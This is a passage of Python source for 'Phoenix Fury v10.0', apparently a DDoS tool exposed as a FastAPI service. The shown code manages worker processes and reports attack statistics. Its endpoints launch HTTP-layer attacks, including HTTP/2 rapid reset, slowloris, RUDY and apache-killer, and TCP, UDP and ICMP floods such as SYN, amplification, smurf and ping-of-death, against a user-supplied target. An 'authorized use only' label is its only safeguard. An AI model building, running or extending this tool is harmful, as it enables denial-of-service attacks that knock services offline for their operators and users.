| self.stop_event.set() |
| |
| for p in self.processes: |
| p.join(timeout=3) |
| |
| for p in self.processes: |
| if p.is_alive(): |
| p.terminate() |
| |
| if self.stats_thread: |
| self.stats_thread.join(timeout=2) |
| |
| elapsed = time.time() - self.start_time |
| total_sent = self.counter.value |
| avg_rate = total_sent / elapsed if elapsed > 0 else 0 |
| |
| print("\n" + "=" * 80) |
| print("✅ ATTACK TERMINATED") |
| print(f" Total Requests: {total_sent:,}") |
| print(f" Elapsed Time: {elapsed:.2f}s") |
| print(f" Average Rate: {avg_rate:,.2f} RPS/PPS") |
| print("=" * 80 + "\n") |
| |
| self._reset_state() |
| |
| def get_status(self) -> StatusResponse: |
| with self.lock: |
| elapsed = time.time() - self.start_time if self.attack_active else 0 |
| total = self.counter.value |
| avg_rate = total / elapsed if elapsed > 0 else 0 |
| |
| return StatusResponse( |
| attack_active=self.attack_active, |
| attack_type=self.attack_type, |
| target_host=self.target_host, |
| target_ip=self.target_ip, |
| port=self.port, |
| duration=self.duration, |
| elapsed_time=round(elapsed, 2), |
| processes=self.process_count, |
| total_sent=total, |
| current_rate_pps_rps=round(self.current_rate, 2), |
| average_rate=round(avg_rate, 2), |
| cpu_usage_percent=psutil.cpu_percent(interval=0.1), |
| memory_usage_percent=psutil.virtual_memory().percent |
| ) |
|
|
| |
| |
| |
|
|
| app = FastAPI( |
| title="🔥 Phoenix Fury v10.0 ULTIMATE - Maximum Methods Edition", |
| description="Advanced stress testing with 25+ attack methods. ⚠️ AUTHORIZED USE ONLY", |
| version="10.0.0" |
| ) |
|
|
| MANAGER = AttackManager() |
|
|
| def run_attack_lifecycle(config, family: str, background_tasks: BackgroundTasks): |
| """Handle attack lifecycle.""" |
| MANAGER.start(config, family) |
| |
| def delayed_stop(): |
| time.sleep(config.duration) |
| MANAGER.stop() |
| |
| stop_thread = threading.Thread(target=delayed_stop, daemon=True) |
| stop_thread.start() |
|
|
| @app.on_event("startup") |
| async def on_startup(): |
| print("=" * 80) |
| print(f"🔥 Phoenix Fury v10.0 ULTIMATE API is ONLINE") |
| print(f" System: {CPU_COUNT} CPU Cores, {TOTAL_RAM_GB:.1f} GB RAM") |
| print(f" Config: {MAX_PROCESSES} Workers, {REQUESTS_PER_CONNECTION} L7 reqs/conn") |
| print(f" HTTP/2: {'✅ ENABLED' if H2_AVAILABLE else '❌ DISABLED (pip install h2)'}") |
| print(f" Raw Sockets: {'✅ YES (L4 Available)' if check_root() else '⚠️ NO (L4 Limited)'}") |
| print(f" Methods: 25+ Attack Vectors Available") |
| print("=" * 80) |
|
|
| @app.post("/attack/layer7", status_code=202) |
| def api_start_l7(config: L7Config, background_tasks: BackgroundTasks): |
| """ |
| Start Layer 7 HTTP attack. |
| |
| Available methods: |
| - Standard: get, post, head, put, delete, options, patch, trace |
| - HTTP/2: http2-rapid-reset, http2-flood, http2-slowloris |
| - Slowloris: slowloris, slow-post, slow-read, rudy |
| - Advanced: apache-killer, range-header, cache-bypass |
| """ |
| run_attack_lifecycle(config, 'l7', background_tasks) |
| return {"status": "accepted", "message": f"L7 {config.method.upper()} attack initiated on {config.target}:{config.port}"} |
|
|
| @app.post("/attack/layer4/tcp", status_code=202) |
| def api_start_l4_tcp(config: L4TCPConfig, background_tasks: BackgroundTasks): |
| """ |
| Start Layer 4 TCP attack. |
| |
| Available methods: |
| - syn, ack, fin, rst, psh, urg |
| - syn-ack, xmas, null, land, fragmented |
| """ |
| run_attack_lifecycle(config, 'l4-tcp', background_tasks) |
| return {"status": "accepted", "message": f"L4 TCP {config.method.upper()} attack initiated"} |
|
|
| @app.post("/attack/layer4/udp", status_code=202) |
| def api_start_l4_udp(config: L4UDPConfig, background_tasks: BackgroundTasks): |
| """ |
| Start Layer 4 UDP attack. |
| |
| Available methods: |
| - flood, fragmented, amplification |
| """ |
| run_attack_lifecycle(config, 'l4-udp', background_tasks) |
| return {"status": "accepted", "message": f"L4 UDP {config.method.upper()} attack initiated"} |
|
|
| @app.post("/attack/layer4/icmp", status_code=202) |
| def api_start_l4_icmp(config: L4ICMPConfig, background_tasks: BackgroundTasks): |
| """ |
| Start Layer 4 ICMP attack. |
| |
| Available methods: |
| - ping-flood, smurf, ping-of-death |
| """ |
| run_attack_lifecycle(config, 'l4-icmp', background_tasks) |
| return {"status": "accepted", "message": f"L4 ICMP {config.method.upper()} attack initiated"} |
|
|
| @app.post("/attack/stop") |
| def api_stop_attack(): |
| """Stop current attack.""" |
| if not MANAGER.is_active(): |
| return {"status": "info", "message": "No attack is currently running."} |
| MANAGER.stop() |
| return {"status": "success", "message": "Attack stopped successfully."} |
|
|
| @app.get("/status", response_model=StatusResponse) |
| def get_status(): |
| """Get real-time attack status and system metrics.""" |
| return MANAGER.get_status() |
|
|
| @app.get("/methods") |
| def list_methods(): |
| """List all available attack methods.""" |
| return { |
| "layer7": { |
| "standard_http": ["get", "post", "head", "put", "delete", "options", "patch", "trace"], |
| "http2_attacks": ["http2-rapid-reset", "http2-flood", "http2-slowloris"], |
| "slowloris_variants": ["slowloris", "slow-post", "slow-read", "rudy"], |
| "advanced": ["apache-killer", "range-header", "cache-bypass", "xmlrpc", "wordpress-xmlrpc", "hash-collision"] |
| }, |
| "layer4": { |
| "tcp": ["syn", "ack", "fin", "rst", "psh", "urg", "syn-ack", "xmas", "null", "land", "fragmented"], |
| "udp": ["flood", "fragmented", "amplification"], |
| "icmp": ["ping-flood", "smurf", "ping-of-death"] |
| }, |
| "total_methods": 30 |
| } |
|
|
| @app.get("/") |
| def root(): |
| """Root endpoint with API information.""" |
| return { |
| "message": "🔥 Phoenix Fury v10.0 ULTIMATE - Maximum Methods Edition", |
| "version": "10.0.0", |
| "docs_url": "/docs", |
| "status_url": "/status", |
| "methods_url": "/methods", |
| "features": { |
| "http2_rapid_reset": H2_AVAILABLE, |
| "raw_sockets": check_root(), |
| "auto_optimized": True, |
| "total_methods": 30 |
| }, |
| "system_info": { |
| "cpu_cores": CPU_COUNT, |
| "worker_processes": MAX_PROCESSES, |
| "ram_gb": round(TOTAL_RAM_GB, 2) |
| } |
| } |
|
|
| @app.get("/health") |
| def health_check(): |
| """Health check endpoint.""" |
| return { |
| "status": "healthy", |
| "attack_active": MANAGER.is_active(), |
| "timestamp": time.time() |
| } |
|
|
| |
| |
| |
|
|
| if __name__ == "__main__": |
| multiprocessing.freeze_support() |
| |
| |
| print("=" * 80) |
| print("🔥 PHOENIX FURY v10.0 ULTIMATE - MAXIMUM METHODS EDITION") |
| print("=" * 80) |
| print(f"System: {CPU_COUNT} cores, {TOTAL_RAM_GB:.1f}GB RAM") |
| print(f"Workers: {MAX_PROCESSES} processes") |
| print(f"Methods: 30+ attack vectors") |
| print(f"Raw Sockets: {'✅ Available' if check_root() else '⚠️ Limited (no root)'}") |
| print("=" * 80) |
| |
| uvicorn.run( |
| app, |
| host="0.0.0.0", |
| port=8000, |
| workers=1, |
| log_level="info", |
| access_log=True |
| ) |
